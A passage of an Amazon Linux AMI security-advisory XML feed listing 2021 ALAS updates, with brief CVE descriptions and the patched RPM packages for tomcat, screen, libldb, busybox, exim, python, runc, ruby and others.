arch="noarch"><filename>Packages/emacs-git-el-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="gitweb" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-all" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-svn" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-core-doc" version="2.18.5" release="2.73.amzn1" epoch="0" arch="noarch"><filename>Packages/git-core-doc-2.18.5-2.73.amzn1.noarch.rpm</filename></package><package name="git-instaweb" version="2.18.5" release="2.73.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-instaweb-2.18.5-2.73.amzn1.x86_64.rpm</filename></package><package name="git-core" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-core-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-instaweb" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-instaweb-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-subtree" version="2.18.5" release="2.73.amzn1" epoch="0" 
arch="i686"><filename>Packages/git-subtree-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.18.5-2.73.amzn1.i686.rpm</filename></package><package name="git" version="2.18.5" release="2.73.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.18.5-2.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1491</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1491: important priority package update for tomcat8</title><issued date="2021-03-23 23:07:00" /><updated date="2021-03-25 19:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25122:
When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.
1934032: CVE-2021-25122 tomcat: Request mix-up with h2c
CVE-2020-9484:
A deserialization flaw was discovered in Apache Tomcat's use of a FileStore. Under specific circumstances, an attacker can use a specially crafted request to trigger Remote Code Execution through deserialization of the file under their control. The highest threat from the vulnerability is to data confidentiality and integrity as well as system availability.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25122" title="" id="CVE-2021-25122" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-log4j" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.63-1.87.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-lib" version="8.5.63" release="1.87.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.63-1.87.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1492</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1492: low priority package update for screen</title><issued date="2021-04-07 00:18:00" /><updated date="2021-04-07 18:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-26937:
A flaw was found in screen. A specially crafted sequence of combining characters could cause an out of bounds write leading to arbitrary code execution. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1927062: CVE-2021-26937 screen: crash when processing combining chars
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26937" title="" id="CVE-2021-26937" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="screen-debuginfo" version="4.0.3" release="19.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/screen-debuginfo-4.0.3-19.7.amzn1.x86_64.rpm</filename></package><package name="screen" version="4.0.3" release="19.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/screen-4.0.3-19.7.amzn1.x86_64.rpm</filename></package><package name="screen-debuginfo" version="4.0.3" release="19.7.amzn1" epoch="0" arch="i686"><filename>Packages/screen-debuginfo-4.0.3-19.7.amzn1.i686.rpm</filename></package><package name="screen" version="4.0.3" release="19.7.amzn1" epoch="0" arch="i686"><filename>Packages/screen-4.0.3-19.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1493</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1493: low priority package update for tomcat7</title><issued date="2021-04-07 00:18:00" /><updated date="2021-04-07 18:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-25329:
The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0 to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9484. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.
1934061: CVE-2021-25329 tomcat: Incomplete fix for CVE-2020-9484 (RCE via session persistence)
CVE-2020-9484:
A deserialization flaw was discovered in Apache Tomcat's use of a FileStore. Under specific circumstances, an attacker can use a specially crafted request to trigger Remote Code Execution through deserialization of the file under their control. The highest threat from the vulnerability is to data confidentiality and integrity as well as system availability.
1838332: CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9484" title="" id="CVE-2020-9484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25329" title="" id="CVE-2021-25329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-webapps" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.108-1.40.amzn1.noarch.rpm</filename></package><package 
name="tomcat7-docs-webapp" version="7.0.108" release="1.40.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.108-1.40.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1494</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1494: important priority package update for libldb</title><issued date="2021-04-19 17:26:00" /><updated date="2021-04-21 17:50:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-20277:
A flaw was found in Samba's libldb. Multiple, consecutive leading spaces in an LDAP attribute can lead to an out-of-bounds memory write, leading to a crash of the LDAP server process handling the request. The highest threat from this vulnerability is to system availability.
1941402: CVE-2021-20277 samba: Out of bounds read in AD DC LDAP server
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20277" title="" id="CVE-2021-20277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="pyldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-devel-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="pyldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/pyldb-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="libldb-debuginfo" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-debuginfo-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="libldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/libldb-devel-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="ldb-tools" version="1.5.4" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ldb-tools-1.5.4-2.17.amzn1.x86_64.rpm</filename></package><package name="libldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="libldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-devel-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="pyldb" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/pyldb-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="libldb-debuginfo" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/libldb-debuginfo-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="pyldb-devel" version="1.5.4" release="2.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/pyldb-devel-1.5.4-2.17.amzn1.i686.rpm</filename></package><package name="ldb-tools" version="1.5.4" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/ldb-tools-1.5.4-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1495</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1495: medium priority package update for nvidia</title><issued date="2021-04-19 17:41:00" /><updated date="2021-04-21 17:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-1076:
Security fix for nvidia.
CVE-2021-1076: nvidia
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1076" title="" id="CVE-2021-1076" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nvidia" version="418.197.02" release="2018.03.117.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-418.197.02-2018.03.117.amzn1.x86_64.rpm</filename></package><package name="nvidia-dkms" version="418.197.02" release="2018.03.117.amzn1" epoch="2" arch="x86_64"><filename>Packages/nvidia-dkms-418.197.02-2018.03.117.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1496</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1496: medium priority package update for busybox</title><issued date="2021-05-06 19:11:00" /><updated date="2021-05-07 19:54:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28831:
decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.
1941028: CVE-2021-28831 busybox: invalid free or segmentation fault via malformed gzip data
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831" title="" id="CVE-2021-28831" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox" version="1.19.3" release="2.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.19.3-2.12.amzn1.x86_64.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.19.3-2.12.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.19.3" release="2.12.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.19.3-2.12.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.19.3" release="2.12.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.19.3-2.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1497</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1497: important priority package update for exim</title><issued date="2021-05-06 19:11:00" /><updated date="2021-05-07 20:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-28021:
99999: Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. An authenticated remote SMTP client can insert newline characters into a spool file (which indirectly leads to remote code execution as root) via AUTH= in a MAIL FROM command.
CVE-2020-28018:
99999: Exim 4 before 4.94.2 allows Use After Free in smtp_reset in certain situations that may be common for builds with OpenSSL.
CVE-2020-28017:
99999: Exim 4 before 4.94.2 allows Integer Overflow to Buffer Overflow in receive_add_recipient via an e-mail message with fifty million recipients. NOTE: remote exploitation may be difficult because of resource consumption.
CVE-2020-28015:
99999: Exim 4 before 4.94.2 has Improper Neutralization of Line Delimiters. Local users can alter the behavior of root processes because a recipient address can have a newline character.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28015" title="" id="CVE-2020-28015" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28017" title="" id="CVE-2020-28017" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28018" title="" id="CVE-2020-28018" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28021" title="" id="CVE-2020-28021" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.27.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/exim-debuginfo-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.27.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1498</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1498: medium priority package update for python35</title><issued date="2021-05-06 19:11:00" /><updated date="2021-05-07 19:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3426:
No description is available for this CVE.
1935913: CVE-2021-3426 python: information disclosure via pydoc
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
1928904: CVE-2021-23336 python: Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a semicolon in query parameters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" title="" id="CVE-2021-3426" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python35-libs" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-libs-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-tools-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-devel" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-devel-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-test-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-debuginfo-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35" version="3.5.10" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/python35-3.5.10-1.30.amzn1.x86_64.rpm</filename></package><package name="python35-libs" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-libs-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-devel" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-devel-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-test" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-test-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-tools" version="3.5.10" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/python35-tools-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35-debuginfo" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-debuginfo-3.5.10-1.30.amzn1.i686.rpm</filename></package><package name="python35" version="3.5.10" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/python35-3.5.10-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1499</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1499: important priority package update for runc</title><issued date="2021-05-14 16:52:00" /><updated date="2021-05-19 17:34:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-30465:
RESERVED
CVE-2021-30465 runc: reserved
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30465" title="" id="CVE-2021-30465" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.0.0" release="0.3.20210225.git12644e6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.0.0-0.3.20210225.git12644e6.4.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.0.0" release="0.3.20210225.git12644e6.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.0.0-0.3.20210225.git12644e6.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1500</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1500: medium priority package update for python36</title><issued date="2021-05-14 16:53:00" /><updated date="2021-05-19 17:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3426:
No description is available for this CVE.
1935913: CVE-2021-3426 python: information disclosure via pydoc
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
1928904: CVE-2021-23336 python: Web cache poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a semicolon in query parameters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" title="" id="CVE-2021-3426" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python36-debuginfo" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debuginfo-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-libs-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-debug-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-tools-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-test-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/python36-devel-3.6.12-1.21.amzn1.x86_64.rpm</filename></package><package name="python36-tools" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-tools-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-debuginfo" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debuginfo-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-test" version="3.6.12" release="1.21.amzn1" 
epoch="0" arch="i686"><filename>Packages/python36-test-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-debug" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-debug-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-devel" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-devel-3.6.12-1.21.amzn1.i686.rpm</filename></package><package name="python36-libs" version="3.6.12" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/python36-libs-3.6.12-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1501</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1501: medium priority package update for ruby24</title><issued date="2021-05-14 16:58:00" /><updated date="2021-05-19 17:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-28965:
The REXML gem before 3.2.5 in Ruby before 2.6.7, 2.7.x before 2.7.3, and 3.x before 3.0.1 does not properly address XML round-trip issues. An incorrect document can be produced after parsing and serializing.
1947526: CVE-2021-28965 ruby: XML round-trip vulnerability in REXML
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28965" title="" id="CVE-2021-28965" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems24-devel" version="2.6.14.4" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.14.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.14.amzn1.noarch.rpm</filename></package><package name="rubygems24" version="2.6.14.4" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.14.amzn1.noarch.rpm</filename></package><package name="ruby24-irb" 